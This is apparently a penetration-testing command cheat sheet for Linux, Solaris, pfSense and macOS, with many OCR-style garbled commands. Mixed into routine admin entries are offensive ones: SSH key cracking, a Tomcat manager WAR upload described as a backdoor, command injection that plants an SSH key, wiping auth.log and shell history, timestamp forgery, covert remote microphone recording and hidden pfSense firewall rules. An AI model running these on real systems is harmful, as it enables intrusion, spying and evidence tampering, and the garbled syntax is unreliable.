Command

Explanation

watch ss -tp

Network communication

netstat -ant

tcp or udp communication -anu=udp

netstat -tulpn

Communication with PIDs

lsof -i

Established communication

smb:// ip /share

smb shared environment access

share user x.x.x.x c$

Mount the shared Windows environment

smbclient -0 user\ ip \ share

Connect to SMB

ifconfig eth# ip I cidr

Set IP and netmask

ifconfig eth0:1 ip I cidr

Virtual interface setting

route add default gw gw lp

Set GW

ifconfig eth# mtu [size]

Change the MTU size

export MAC=xx: XX: XX: XX: XX: XX

Change the MAC

ifconfig int hw ether MAC

Change the MAC

macchanger -m MAC int

Change Mac in Backtrack

iwlist int scan

Wi-Fi scanner

nc -lvvp port

Listening to a specific port

python3 -m http.server port

Create a web server

dig -x ip

Identifying the domains of an ip

host ip

Identifying the domains of an ip

host -t SRV _ service tcp.url.com

Identification of domain SRV

dig @ ip domain -t AXrR

Identify DNS Zone Xfer

host -1 domain namesvr

Identify DNS Zone Xfer

ip xfrm state list

Show available VPN

ip addr add ip I cidr aev ethO

Add ‘hidden’ interface

/var/log/messages I grep DHCP

DHCP list

tcpkill host ip and port port

Blocking ip:port

echo “1” /proc/sys/net/ipv4/ip forward

Enable IP Forwarding

echo ‘‘nameserver x.x.x.x’’ /etc7resolv.conf

Add DNS server

showmount -e ip

Show mounted points

mkdir /site_backups; mount -t nfs ip:/ /site_backup

mount route shared by ip

Command

Explanation

nbstate -A -ip

Get hostname for ip

id

Current username

w

Logged in user

who -a

User information

last -a

The last logged in user

ps -ef

Available system processes (or use top)

df -h

The amount of disk usage (or using free)

uname -a

Show the kernel version along with the processor structure

mount

Mount the file system

getent passwd

Display the list of users

PATH~$PATH:/home/mypath

Add variable to PATH

kill pid

Kill process with pid

cat /etc/issue

Display operating system information

cat /etc/’release’

Display operating system version information

cat /proc/version

Display kernel version information

rpm –query -all

Installed packages (in Redhat)

rpm -ivh ‘ .rpm

Installing rpm packages (to remove -e=remove)

dpkg -get-selections

Installed packages (in Ubuntu)

dpkg -I ‘.deb

Install DEB packages (to remove -r=remove)

pkginfo

Installed packages (on Solaris)

which tscsh/csh/ksh/bash

Display the paths of executable files

chmod -so tcsh/csh/ksh

Disabling shell and also forcing to use bash

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

Finding files with suid

find / -uid 0 -perm -4000 -type f 2>/dev/null

Finding files with suid

find / -writable ! -user whoami -type f ! -path “/proc/” ! -path “/sys/” -exec ls -al {} \; 2>/dev/null

Show writable files

Command

Explanation

python -c “import pty;pty.spawn(‘/bin/bash’)”

Shell interactive

wget http:// url -0 url.txt -o /dev/null

Get the address

rdesktop ip

Access to desktop ip

scp /tmp/file user@x.x.x.x:/tmp/file

Send file

scp user@ remoteip :/tmp/file /tmp/file

Get the file

useradd -m user

added by the user

passwd user

Change user password

rmuser unarne

Delete user

script -a outfile

Loose recording: Ctrl-D to stop

apropos subject

Related commands

History

History of user commands

! num

Executive lines in history

ssh2john.py id_rsa > ssh-key

Find the passphrase

john ssh-key

Find the passphrase

ssh -i id_rsa user@ip

Connect with key and passphrase

id -u

Get user id

cut -d: -f3 < <(getent group GROUPNAME)

Get group id

curl -G ‘http://example.com/file.php’ –data-urlencode ‘cmd=echo ssh-rsa AA………..’

Sending information with the get method in curl

curl –user ‘tomcat:$3cureP4s5w0rd123!’ –upload-file exploit.war “http://megahosting.com:8080/ma

nager/text/deploy?path=/exploit.war”

Create backdoor with lfi vulnerability in java

diff file file2

Compare two files

rm -rf dir

Forced deletion of folders nested

shred -f -u file

Rewrite or delete the file

touch -r ref file

Adapting timestamp related to ref_file

touch -t YYYYMMDDHHSS file

set file timestamp

sudo fdisk -1

List of connected drivers

mount /dev/sda# /mnt/usbkey

Mounting usb devices

md5sum -t file

md5 crisp accounting

echo -n "str" | md5sum

Generate md5 hash

shalsum file

The SHAl hash of the file

sort -u

Relating and displaying unique lines

grep -c ''str'' file

grep -Hnri word * | vim -

Search for the desired word in files along with the file name

grep -rial word

Files containing the desired word

tar cf file.tar files

Create .tar from files

tar xf file.tar

Extract .tar

tar czf file.tar.gz files

Create .tar.gz

tar xzf file.tar.gz

Extract .tar.gz

tar cjf file.tar.bz2 files

Create .tar.bz2

tar xjf file.tar.bz2

Extract .tar.bz2

gzip file

Compress and rename the file

gzip -d file. gz

Not compressing file.gz

upx -9 -o out.exe orig.exe

Get UPX packs related to orig.exe

zip -r zipname.zip \Directory\'

Create zip

dd skip=lOOO count=2000 bs=S if=file of=file

Separate 1 to 3 KB from the file

split -b 9K file prefix

Separation of 9 KB sections from the file

awk 'sub("$"."\r")' unix.txt win.txt

Windows compatible txt file

find -i -name file -type '.pdf

Search for PDF files

find I -perm -4000 -o -perm -2000 -exec ls -

ldb {} \;

Search setuid files

dos2unix file

Switch to *nix format

file file

Determine the file type and format

chattr (+/-)i file

setting or not setting the immutable bit

while [ $? -eq 0 ]; do cd flag/; done

Enter infinite nested folder

Command

Explanation

unset HISTFILE

Disable reports in history

ssh user@ ip arecord - I aplay -

Remote microphone recording

gcc -o outfile myfile.c

Compile C, C++

init 6

Restart (0 = shutdown)

cat /etc/ 1 syslog 1 .conf 1 grep -v ‘’”#’’

list of report files

grep ‘href=’ file 1 cut -d”/” -f3 I grep url | sort -u

Separation of links url.com

dd if=/dev/urandom of= file bs=3145728 count=100

Create a 3 MB file

Command

Explanation

echo “” /var/log/auth.log

Delete the auth.log file

echo ‘’’’ -/.bash history

Delete the session history of the current user

rm -/.bash history/ -rf

Delete the file .bash_history

history -c

Delete the session history of the current user

export HISTFILESIZE=0

Setting the maximum lines of the history file to zero

export HISTSIZE=0

Setting the maximum number of commands in the history file to zero

unset HISTFILE

delete history (need to log in again to apply)

kill -9 $$

Delete the current meeting

ln /dev/null -/.bash_historj -sf

Permanently send all history commands to /dev/null

Position

Explanation

/bin

System binary files

/boot

Files related to the boot process

/dev

Interfaces related to system devices

/etc

System configuration files

/home

A basic place for users and libraries

/opt

Essential software libraries

/proc

Executive and systemic processes

/root

The base path for the root user

/sbin

executable files of the root user

/tmp

Temporary files

/usr

Not very necessary files

/var

System variables file

File

Explanation

/etc/shadow

Hash of local users

/etc/passwd

Local users

/etc/group

Local groups

/etc/rc.d

Startup services

/etc/init.d

Services

/etc/hosts

List of hostnames and IPs

/etc/HOSTNAME

Show hostname along with domain

/etc/network/interfaces

Network communication

/etc/profile

System environment variables

/etc/apt/sources.list

list of ubuntu distribution sources

/etc/resolv.conf

namserver settings

/horne/ user /.bash history

bash history (also in /root/)

/usr/share/wireshark/manuf

MAC Manufacturer

-/.ssh/

Location of ssh keystores

/var/log

System reports file (for Linux)

/var/adrn

System reports file (for Unix)

/var/spool/cron

List of files in cron

/var/log/apache/access.log

Apache communication reports

/etc/fstab

Fixed system information file

iptables-save -c file

Extract iptable rules and save to file

iptables-restore file

retrieving iptables rules

iptables -L -v --line-numbers

List of all rules with their line number

iptables -F

Restart all rules

iptables -P INPUT/FORWARD/OUTPUT

ACCEPT/REJECT/DROP

Policy change if rules are not met

iptables -A INPUT -i interface -m state --state RELATED,ESTABLcSHED -j ACCEPT

Allow connections made on INPUT

iptables -D INPUT 7

Remove 7 layers of inbound rules

iptables -t raw -L -n

Increase productivity by disabling statefulness

iptables -P INPUT DROP

Delete all packets

service --status-all

[+] Service starts at boot

[-] Service does not start

service service start

start service

service service stop

stop service

service service status

Check service status

update-rc.d -f service remove

Remove the existing system startup service (-f for the /etc/init.d file if it already exists)

update-rc.d service defaults

Added service in system startup

Command

Explanation

chkconfig –list

List of available services and implementation status

chkconfig service -list

The status of a service

chkconfig service on [–level 3]

Adding the service [Its layer can also be specified]

chkconfig service off [–level 3] e.g. chkconfig iptables off

Remove the service

Command

Explanation

screen -S name

Create a new screen with the name

screen -ls

List of running screens

screen -r name

Addition to screen with the name

screen -S name -X cmd

Send command to screen with the name

C-a?

List of key combinations (help)

C-a d

Addition removal

C-a D D

Removal of joining and leaving

C-a c

Create a new window

C-a C-a

Switch to the last window

C-a ‘num|name

Switch to the window named

C-a “

Show window list and changes

C-a k

Delete the current window

C-a S

Horizontal separation of the display

C-a V

Vertical separation of the display

C-a tab

Jump to the last screen

C-a X

Delete the current section

C-a Q

Delete all sections except the current section

Command

Explanation

pfSsh.php

Shell pfSense

pfSsh.php playback enableallowallwan

Allowing connections to inbound connections on the WAN (Adding hidden rules to WAN rules )

pfSsh.php playback enablesshd

Enable inbound/outbound ssh

pfctl -sn

Show NAT rules

pfctl -sr

Show filter rules

pfctl -sa

Show all rules

viconfig

Edit settings

rm /tmp/config.cache

Target cache (or backup) settings after its execution

/etc/rc.reload_all

Reload the entire configuration

Command

Explanation

ifconfig -a

List of all interfaces

netstat -in

List of all interfaces

ifconfig -r

List of routes

ifconfig eth0 dhcp

Start DHCP in user

ifconfig eth0 plumb up ip netmask nmask

IP setting

route add default ip

Gateway setting

logins -p

List of users and passwords

svcs -a

List of all services along with status

prstat -a

Status of processes (also command top)

svcadm start ssh

Start the SSH service

inetadm -e telnet (-d for disable)

telnet activation

prtconf I grep Memorj

Total physical memory

iostat -En

Hard disk size

showrev -c /usr/bin/bash

Binary information

shutdown -i6 -g0 -y

Restart the system

dfmounts

List of users connected to NFS

smc

GUI management

snoop -d int -c pkt # -o results.pcap

Packet recording

/etc/vfstab

Mounted system file table

/var/adm/logging

Reports list of login attempts

/etc/default/’

Default settings

/etc/system

Kernel modules and settings

/var/adm/messages

syslog path

/etc/auto ‘

Automounter settings file

/etc/inet/ipnodes

IPv4 and IPv6 hosts files

File

Description

~/.viminfo

vim editor file

Command

Explanation

top

shows real-time system statistics including CPU usage, memory usage, and running processes.

ps aux

displays a list of running processes with their associated details.

netstat

displays active network connections, routing tables, and a number of network interface and protocol statistics.

shows all active network connections and which processes are using them.displays a list of running processes with their associated details.

tcpdump

allows the capture and analysis of network traffic.

tail -f /var/log/system.log

displays real-time updates to the macOS system log.

log show –predicate ‘process == “PROCESS_NAME”’ –info

displays system log entries for a specific process.

fs_usage

shows real-time file system activity, including which files are being accessed and by which processes.

fseventer

displays a graphical representation of file system activity.

dtrace

allows the tracing and analysis of system events.

launchctl list

displays a list of all currently loaded launch daemons and agents.

Command

Explanation

/Users/<username>/Library/Preferences/.GlobalPreferences.plist

The user plist file for the currently logged-in user can be found in here

/Users/<username>/Library/Preferences/

Other user plist files can be found in here

defaults read <path_to_plist_file>

Read a plist file

defaults write <path_to_plist_file> <key> <value>

Write a plist file

defaults delete <path_to_plist_file> <key>

Delete a key from a plist file

PlistBuddy -c "Open <path_to_plist_file>"

Open a plist file

PlistBuddy -c "Print <key>" <path_to_plist_file>

Print a value from a plist file

PlistBuddy -c "Add <key> <type> <value>" <path_to_plist_file>

Add a new key-value pair to a plist file

PlistBuddy -c "Delete <key>" <path_to_plist_file>

Delete a key from a plist file

PlistBuddy -c "Set <key> <value>" <path_to_plist_file>

Set the value of a key in a plist file

plutil -lint <path_to_plist_file>

Validate a plist file

plutil -convert xml1 <path_to_plist_file>

Convert a plist file to XML format

Command

Explanation

sudo dscl . -create /Users/newusername

create a new user

sudo dscl . -passwd /Users/newusername password

set the user’s password

sudo dscl . -append /Groups/admin GroupMembership newusername

make the user an administrator

sudo dseditgroup -o create -r "Group Name" groupname

create a new group

sudo dseditgroup -o edit -a username -t user groupname

add users to the group

dscl . -read /Groups/groupname GroupMembership

list the members of a group

sudo dseditgroup -o delete groupname

delete a group

sudo dseditgroup -o edit -d username -t user groupname

remove a user from a group

sudo dseditgroup -o edit -n newgroupname -r oldgroupname

rename a group